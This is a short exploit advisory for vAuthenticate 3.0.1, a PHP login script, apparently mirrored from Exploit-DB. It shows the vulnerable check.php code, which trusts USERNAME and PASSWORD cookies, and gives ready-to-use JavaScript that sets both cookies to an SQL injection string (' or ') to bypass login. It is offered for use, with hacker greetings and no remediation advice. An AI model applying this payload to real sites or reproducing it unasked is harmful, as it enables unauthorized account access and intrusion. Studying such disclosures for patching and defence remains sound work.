vAuthenticate 3.0.1 – Authentication Bypass - 体验盒子

作者： bd0rk

日期： 2011-08-30

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/17752/

-----------------------------------------------------------------------

vAuthenticate 3.0.1 Auth Bypass by Cookie SQL Injection Vulnerability

-----------------------------------------------------------------------

Author: bd0rk

Contact: bd0rk[at]hackermail.com

Date: 2011 / 08 / 30

MEZ-Time: 01:35

Tested on WinVista & Ubuntu-Linux

Affected-Software: vAuthenticate 3.0.1

Vendor: http://www.beanbug.net/vScripts.php

Download: http://www.beanbug.net/Scripts/vAuthenticate_3.0.1.zip

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Found vulnerable code in check.php:

if (isset($_COOKIE['USERNAME']) && isset($_COOKIE['PASSWORD']))
{
// Get values from superglobal variables
$USERNAME = $_COOKIE['USERNAME'];
$PASSWORD = $_COOKIE['PASSWORD'];

$CheckSecurity = new auth();
$check = $CheckSecurity->page_check($USERNAME, $PASSWORD);
}
else
{
$check = false;
}

	if ($check == false)
	{

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Exploit: javascript:document.cookie = "[USERNAME]=' or '; [PATH]";

 javascript:document.cookie = "[PASSWORD]=' or '; [PATH]";


Them use login.php 4AuthBypass :P

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



---Greetings from hot Germany, the 22 years old bd0rk. :-)

Special-Greetz: Zubair Anjum, Perle, DJTrebo, Anonymous, GolD_M, hoohead